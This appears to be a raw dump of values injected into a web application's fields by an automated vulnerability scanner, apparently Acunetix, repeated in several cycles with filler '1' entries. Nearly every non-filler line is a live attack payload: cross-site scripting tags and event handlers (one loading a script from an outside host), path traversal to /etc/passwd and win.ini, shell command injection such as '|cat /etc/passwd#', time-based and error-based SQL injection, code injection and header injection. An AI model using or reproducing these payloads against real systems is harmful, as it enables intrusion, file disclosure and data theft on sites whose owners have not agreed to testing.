1<ScRiPt >prompt(938959)</ScRiPt>

1

1

../../../../../../../../../../etc/passwd.jpg

1

1

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

${100081+99874}

1<script>prompt(907840)</script>

`cat /etc/passwd`

WEB-INF/web.xml

1

1&n922700=v944636

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1

1

WEB-INF\web.xml

1

1<ScRiPt >prompt(981888)</ScRiPt>

1

|cat /etc/passwd#

1

-1)

1some_inexistent_file_with_long_name%00.jpg

)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?903479></ScRiPt>

-1))

1

'|'ld

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

testasp.vulnweb.com

'"()

ae1sGbUK'

1

1<ScRiPt >prompt(991597)</ScRiPt>

1

^(#$!@#$)(()))******

"|"ld

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1<video><source onerror="javascript:prompt(997241)">

1

1

1

1

5a9pQL8i')

/etc/passwd

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(912204)"></g></svg>

1

1

1

IhVLlP9q'))

1

'

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1<div style=width:expression(prompt(959930))>

-1

"

1

1

1

1

-1)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1<iframe src='data:text/html

'

1

1

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

||cat /etc/passwd

http://hit0Qpkmf8NKc.bxss.me/

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

"

-1))

1<body onload=prompt(988330)>

1

1

acunetix_wvs_invalid_filename

1

3BIsbVzW'

${@print(md5(acunetix_wvs_security_test))}

1

&dir

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(936434)>

comments

1

1

Ch7GjX4r')

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1<img src=xyz OnErRor=prompt(992791)>

1

${@print(md5(acunetix_wvs_security_test))}\

file:///etc/passwd

EfE7jAmy'))

1

comments

'&dir&'

http://www.acunetix.tst

1

1

1<img/src=">" onerror=alert(909488)>

1

/\../\../\../\../\../\../\../etc/passwd

'"

1

1'"()&%<ScRiPt >prompt(907789)</ScRiPt>

comments/.

"&dir&"

<!--

WEB-INF/web.xml

1

1<ScRiPt%20>prompt(980703)</sCripT>

1

1

'"()&%<ScRiPt >prompt(913911)</ScRiPt>

1

|dir

1

1

1_958971

WEB-INF\web.xml

1

1

1&lt

response.write(9039788*9318714)

1

1

1

1

../../../../../../../../../../windows/win.ini

'|dir

'+response.write(9039788*9318714)+'

1

1

\xf6<img acu onmouseover=prompt(917565) //\xf6>

../../../../../../../../../../boot.ini

"+response.write(9039788*9318714)+"

1

1

1

"|dir

1

../../../../../../../../../../windows/win.ini.jpg

1

1<input autofocus onfocus=prompt(999334)>

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

<a href='http://www.acunetix.com'>website security</a>

1

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1

[url=http://www.acunetix.com]website security[/url]

................windowswin.ini

1

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1

../../../../../../../../../../etc/passwd

1_BHmF8 <ScRiPt >prompt(998873)</ScRiPt>

acu9550\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9550

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

cat /etc/passwd

acux9016\xc0\xbez1\xc0\xbcz2a\x90bcxuca9016

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

`cat /etc/passwd`

1<ScRiPt >prompt(907915)</ScRiPt>

../../../../../../../../../../etc/passwd.jpg

1

1

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

|cat /etc/passwd#

1<script>prompt(988979)</script>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

${99524+99727}

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'|'ld

1<ScRiPt >prompt(949283)</ScRiPt>

1

1

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

"|"ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?966230></ScRiPt>

WEB-INF/web.xml

1&n913020=v942076

1

1

-1

1

1some_inexistent_file_with_long_name%00.jpg

1

WEB-INF\web.xml

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<ScRiPt >prompt(974239)</ScRiPt>

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

-1)

'

/etc/passwd

1

1<video><source onerror="javascript:prompt(976924)">

)

-1))

1

testasp.vulnweb.com

1

'"()

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(919142)"></g></svg>

!(()&&!|*|*|

"

kOZaMLBd'

1

1

1

1

||cat /etc/passwd

Z2D5oiXF')

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1<div style=width:expression(prompt(917774))>

^(#$!@#$)(()))******

1

1

1

1

d7Cenq6J'))

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1<iframe src='data:text/html

1

1

&dir

1

-1

1

1

1

1

1<body onload=prompt(980715)>

'&dir&'

1

1

-1)

'

1

"&dir&"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(973972)>

1

1

file:///etc/passwd

1

1

"

-1))

1

1<img src=xyz OnErRor=prompt(957702)>

1

|dir

http://hitFPA71xXzNk.bxss.me/

/\../\../\../\../\../\../\../etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

1<img/src=">" onerror=alert(961475)>

acunetix_wvs_invalid_filename

yzB000Dk'

1

WEB-INF/web.xml

${@print(md5(acunetix_wvs_security_test))}\

1'"

'|dir

1

1

1<ScRiPt%20>prompt(932134)</sCripT>

comments

96FUEkIP')

1

and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(86),CHAR(112),CHAR(78),CHAR(80),CHAR(71),CHAR(103),CHAR(97),CHAR(72)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and

WEB-INF\web.xml

1

1&lt

comments

"|dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

huOUXOOE'))

../../../../../../../../../../windows/win.ini

(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(86),CHAR(112),CHAR(78),CHAR(80),CHAR(71),CHAR(103),CHAR(97),CHAR(72)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))

1

1

1

1

1

\xf6<img acu onmouseover=prompt(955725) //\xf6>

comments/.

1

1

1

(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(86)+CHAR(112)+CHAR(78)+CHAR(80)+CHAR(71)+CHAR(103)+CHAR(97)+CHAR(72)) FROM syscolumns)

../../../../../../../../../../boot.ini

http://www.acunetix.tst

1

1<input autofocus onfocus=prompt(939698)>

'"

convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(86)+CHAR(112)+CHAR(78)+CHAR(80)+CHAR(71)+CHAR(103)+CHAR(97)+CHAR(72))

1

1

<a href='http://www.acunetix.com'>website security</a>

<!--

1

1

../../../../../../../../../../windows/win.ini.jpg

1

[url=http://www.acunetix.com]website security[/url]

1

'and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(115),CHAR(112),CHAR(87),CHAR(116),CHAR(71),CHAR(70),CHAR(100),CHAR(73)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

1

1

1

1

1

1

1_H1pUs <ScRiPt >prompt(999689)</ScRiPt>

1

'(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(115),CHAR(112),CHAR(87),CHAR(116),CHAR(71),CHAR(70),CHAR(100),CHAR(73)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))'

1'"()&%<ScRiPt >prompt(909465)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

response.write(9439795*9423420)

1

1

................windowswin.ini

'"()&%<ScRiPt >prompt(956376)</ScRiPt>

1

'+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(115)+CHAR(112)+CHAR(87)+CHAR(116)+CHAR(71)+CHAR(70)+CHAR(100)+CHAR(73)) FROM syscolumns)+'

1

1

1

'+response.write(9439795*9423420)+'

1

'+convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(115)+CHAR(112)+CHAR(87)+CHAR(116)+CHAR(71)+CHAR(70)+CHAR(100)+CHAR(73))+'

1

1_924341

..\..\..\..\..\..\..\..\windows\win.ini

"+response.write(9439795*9423420)+"

&cat /etc/passwd&

1

1

1

1

1

"and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(51),CHAR(48),CHAR(98),CHAR(89),CHAR(65),CHAR(78),CHAR(99),CHAR(83)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and"

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

'&cat /etc/passwd&'

1

1

"(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(51),CHAR(48),CHAR(98),CHAR(89),CHAR(65),CHAR(78),CHAR(99),CHAR(83)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))"

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

"&cat /etc/passwd&"

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

"+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(51)+CHAR(48)+CHAR(98)+CHAR(89)+CHAR(65)+CHAR(78)+CHAR(99)+CHAR(83)) FROM syscolumns)+"

1

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

1

"+convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(51)+CHAR(48)+CHAR(98)+CHAR(89)+CHAR(65)+CHAR(78)+CHAR(99)+CHAR(83))+"

SomeCustomInjectedHeader:injected_by_wvs

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

`cat /etc/passwd`

1

acu3479\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3479

../../../../../../../../../../etc/passwd

1

1

1

1

1

1

acux6236\xc0\xbez1\xc0\xbcz2a\x90bcxuca6236

1

1

|cat /etc/passwd#

1

1

1<ScRiPt >prompt(917915)</ScRiPt>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

WEB-INF/web.xml

1

1

${100360+99905}

1

'|'ld

../../../../../../../../../../etc/passwd.jpg

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1<script>prompt(914218)</script>

WEB-INF\web.xml

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

"|"ld

1<ScRiPt >prompt(933488)</ScRiPt>

1&n990833=v970269

1

1

1some_inexistent_file_with_long_name%00.jpg

1

-1

)

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?960839></ScRiPt>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

!(()&&!|*|*|

-1)

1

1

1<ScRiPt >prompt(972691)</ScRiPt>

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

'

testasp.vulnweb.com

^(#$!@#$)(()))******

'"()

1

1<video><source onerror="javascript:prompt(987414)">

-1))

1

1

1

"

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

1

cGRGM1hL'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(954933)"></g></svg>

1

1

||cat /etc/passwd

/etc/passwd

1

1

1

1

gmTOLABR')

1

1<div style=width:expression(prompt(932880))>

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

&dir

1

1

1

1

1<iframe src='data:text/html

ze4SOuqh'))

1

1

'&dir&'

'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

-1

1

http://hitBsYemGAhES.bxss.me/

1<body onload=prompt(978551)>

acunetix_wvs_invalid_filename

1'"

"&dir&"

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

"

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1)

1

comments

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(954910)>

1

and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(70),CHAR(104),CHAR(55),CHAR(103),CHAR(77),CHAR(110),CHAR(105),CHAR(119)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and

1

1

-1))

${@print(md5(acunetix_wvs_security_test))}

|dir

comments

http://www.acunetix.tst

1<img src=xyz OnErRor=prompt(954660)>

'"

(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(70),CHAR(104),CHAR(55),CHAR(103),CHAR(77),CHAR(110),CHAR(105),CHAR(119)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))

4LcsBVhr'

1<img/src=">" onerror=alert(979340)>

'|dir

comments/.

1

${@print(md5(acunetix_wvs_security_test))}\

kRkjc6Uf')

(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(70)+CHAR(104)+CHAR(55)+CHAR(103)+CHAR(77)+CHAR(110)+CHAR(105)+CHAR(119)) FROM syscolumns)

<!--

file:///etc/passwd

1<ScRiPt%20>prompt(979932)</sCripT>

1

"|dir

1

1

1

0WCEmJS5'))

/\../\../\../\../\../\../\../etc/passwd

1&lt

1

convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(70)+CHAR(104)+CHAR(55)+CHAR(103)+CHAR(77)+CHAR(110)+CHAR(105)+CHAR(119))

1

1

1

1

'and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(107),CHAR(66),CHAR(67),CHAR(98),CHAR(104),CHAR(114),CHAR(83),CHAR(69)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

1'"()&%<ScRiPt >prompt(965061)</ScRiPt>

\xf6<img acu onmouseover=prompt(989368) //\xf6>

WEB-INF/web.xml

1

1

1

'(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(107),CHAR(66),CHAR(67),CHAR(98),CHAR(104),CHAR(114),CHAR(83),CHAR(69)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))'

1

1

1

response.write(9180511*9724605)

1<input autofocus onfocus=prompt(906416)>

'"()&%<ScRiPt >prompt(971973)</ScRiPt>

WEB-INF\web.xml

'+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(107)+CHAR(66)+CHAR(67)+CHAR(98)+CHAR(104)+CHAR(114)+CHAR(83)+CHAR(69)) FROM syscolumns)+'

1

1

1

1

'+response.write(9180511*9724605)+'

<a href='http://www.acunetix.com'>website security</a>

../../../../../../../../../../windows/win.ini

1

'+convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(107)+CHAR(66)+CHAR(67)+CHAR(98)+CHAR(104)+CHAR(114)+CHAR(83)+CHAR(69))+'

1_904253

[url=http://www.acunetix.com]website security[/url]

1

"+response.write(9180511*9724605)+"

1

1

1

../../../../../../../../../../boot.ini

"and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(73),CHAR(113),CHAR(101),CHAR(110),CHAR(99),CHAR(68),CHAR(72),CHAR(81)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and"

1

&cat /etc/passwd&

1

1

1_JNhQr <ScRiPt >prompt(953066)</ScRiPt>

1

'&cat /etc/passwd&'

1

../../../../../../../../../../windows/win.ini.jpg

"(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(73),CHAR(113),CHAR(101),CHAR(110),CHAR(99),CHAR(68),CHAR(72),CHAR(81)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))"

1

1

"&cat /etc/passwd&"

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

"+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(73)+CHAR(113)+CHAR(101)+CHAR(110)+CHAR(99)+CHAR(68)+CHAR(72)+CHAR(81)) FROM syscolumns)+"

1

1

"+convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(73)+CHAR(113)+CHAR(101)+CHAR(110)+CHAR(99)+CHAR(68)+CHAR(72)+CHAR(81))+"

1

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

................windowswin.ini

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

..\..\..\..\..\..\..\..\windows\win.ini

../../../../../../../../../../etc/passwd

1

`cat /etc/passwd`

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

acu4230\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4230

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

|cat /etc/passwd#

1

1

../../../../../../../../../../etc/passwd.jpg

acux10216\xc0\xbez1\xc0\xbcz2a\x90bcxuca10216

1

1

'|'ld

1

${99719+100345}

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1<ScRiPt >prompt(959835)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

"|"ld

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1<script>prompt(992318)</script>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1some_inexistent_file_with_long_name%00.jpg

1

1

1&n929178=v908368

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<ScRiPt >prompt(924127)</ScRiPt>

1

-1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

testasp.vulnweb.com

1

1

'

WEB-INF/web.xml

1

-1)

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?931226></ScRiPt>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

"

1

1

)

WEB-INF\web.xml

||cat /etc/passwd

1<ScRiPt >prompt(988770)</ScRiPt>

1

-1))

1

/etc/passwd

1

!(()&&!|*|*|

1

1<video><source onerror="javascript:prompt(918440)">

1

s519PQOs'

&dir

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(939685)"></g></svg>

1

'"()

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

^(#$!@#$)(()))******

1<div style=width:expression(prompt(964951))>

1

1

aj7ZeJiE')

'&dir&'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1<iframe src='data:text/html

1

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

ggdSahFP'))

"&dir&"

1

1<body onload=prompt(928553)>

1

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

"

|dir

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(957353)>

acunetix_wvs_invalid_filename

-1

http://hit1kihz9S74W.bxss.me/

${@print(md5(acunetix_wvs_security_test))}

1

1

1

-1)

'|dir

comments

1<img src=xyz OnErRor=prompt(984010)>

${@print(md5(acunetix_wvs_security_test))}\

1

-1))

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

"|dir

comments

file:///etc/passwd

1

1<img/src=">" onerror=alert(959084)>

1

http://www.acunetix.tst

1

xKrfrTYM'

'"

/\../\../\../\../\../\../\../etc/passwd

1

1

comments/.

1'"()&%<ScRiPt >prompt(984279)</ScRiPt>

1

<!--

FCahsYEx')

1<ScRiPt%20>prompt(957648)</sCripT>

1

WEB-INF/web.xml

1

HjjcB1Kn'))

1

1

1

'"()&%<ScRiPt >prompt(961172)</ScRiPt>

1

WEB-INF\web.xml

1

1

1&lt

1

1

1

1_915585

1

1

response.write(9122151*9165261)

1

../../../../../../../../../../windows/win.ini

1

1

\xf6<img acu onmouseover=prompt(984495) //\xf6>

'+response.write(9122151*9165261)+'

1

&cat /etc/passwd&

1

1

1<input autofocus onfocus=prompt(960009)>

"+response.write(9122151*9165261)+"

../../../../../../../../../../boot.ini

1

1

<a href='http://www.acunetix.com'>website security</a>

'&cat /etc/passwd&'

1

1

[url=http://www.acunetix.com]website security[/url]

../../../../../../../../../../windows/win.ini.jpg

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

SomeCustomInjectedHeader:injected_by_wvs

1_vN3i8 <ScRiPt >prompt(919404)</ScRiPt>

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

................windowswin.ini

1

1

../../../../../../../../../../etc/passwd

1

1

`cat /etc/passwd`

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

|cat /etc/passwd#

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

acu9132\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9132

${99744+99979}

1

1

../../../../../../../../../../etc/passwd.jpg

1

acux5559\xc0\xbez1\xc0\xbcz2a\x90bcxuca5559

'|'ld

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1

"|"ld

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<ScRiPt >prompt(931920)</ScRiPt>

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1&n921505=v901457

1

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1<script>prompt(968244)</script>

1

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<ScRiPt >prompt(990120)</ScRiPt>

1

'

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1

WEB-INF/web.xml

testasp.vulnweb.com

)

1

1

"

-1)

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?957935></ScRiPt>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

!(()&&!|*|*|

WEB-INF\web.xml

1

1

/etc/passwd

1

1<ScRiPt >prompt(961902)</ScRiPt>

||cat /etc/passwd

-1))

1

1

1

^(#$!@#$)(()))******

1

1<video><source onerror="javascript:prompt(979811)">

&dir

oRetfAAG'

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(976354)"></g></svg>

1

1

1

GjEU5jvX')

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

'&dir&'

1

1<div style=width:expression(prompt(955541))>

1

'"()

1

1

pgTn8oDT'))

"&dir&"

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1<iframe src='data:text/html

1

-1

1

1

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<body onload=prompt(972481)>

|dir

1

1

'

-1)

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(987595)>

1

acunetix_wvs_invalid_filename

file:///etc/passwd

-1))

"

1

http://hitPzTioOifbc.bxss.me/

'|dir

DnUJMQC3'

comments

1

1<img src=xyz OnErRor=prompt(960037)>

1

"|dir

1

CdoyIUz5')

/\../\../\../\../\../\../\../etc/passwd

${@print(md5(acunetix_wvs_security_test))}

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1<img/src=">" onerror=alert(938778)>

1

WEB-INF/web.xml

1

comments/.

${@print(md5(acunetix_wvs_security_test))}\

http://www.acunetix.tst

FmTQNcgq'))

1

1

1

1<ScRiPt%20>prompt(979660)</sCripT>

1

'"

1

WEB-INF\web.xml

1

<!--

1

1

1

../../../../../../../../../../windows/win.ini

1

1&lt

1

1

1

1

1

1

1

1

\xf6<img acu onmouseover=prompt(945673) //\xf6>

1

../../../../../../../../../../boot.ini

1

1

1

1

1

1'"()&%<ScRiPt >prompt(925275)</ScRiPt>

1<input autofocus onfocus=prompt(966205)>

1

1

1

<a href='http://www.acunetix.com'>website security</a>

'"()&%<ScRiPt >prompt(915491)</ScRiPt>

1

response.write(9636699*9972585)

../../../../../../../../../../windows/win.ini.jpg

1

[url=http://www.acunetix.com]website security[/url]

1

1

1_927736

1

'+response.write(9636699*9972585)+'

&cat /etc/passwd&

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1_Y6oWb <ScRiPt >prompt(918682)</ScRiPt>

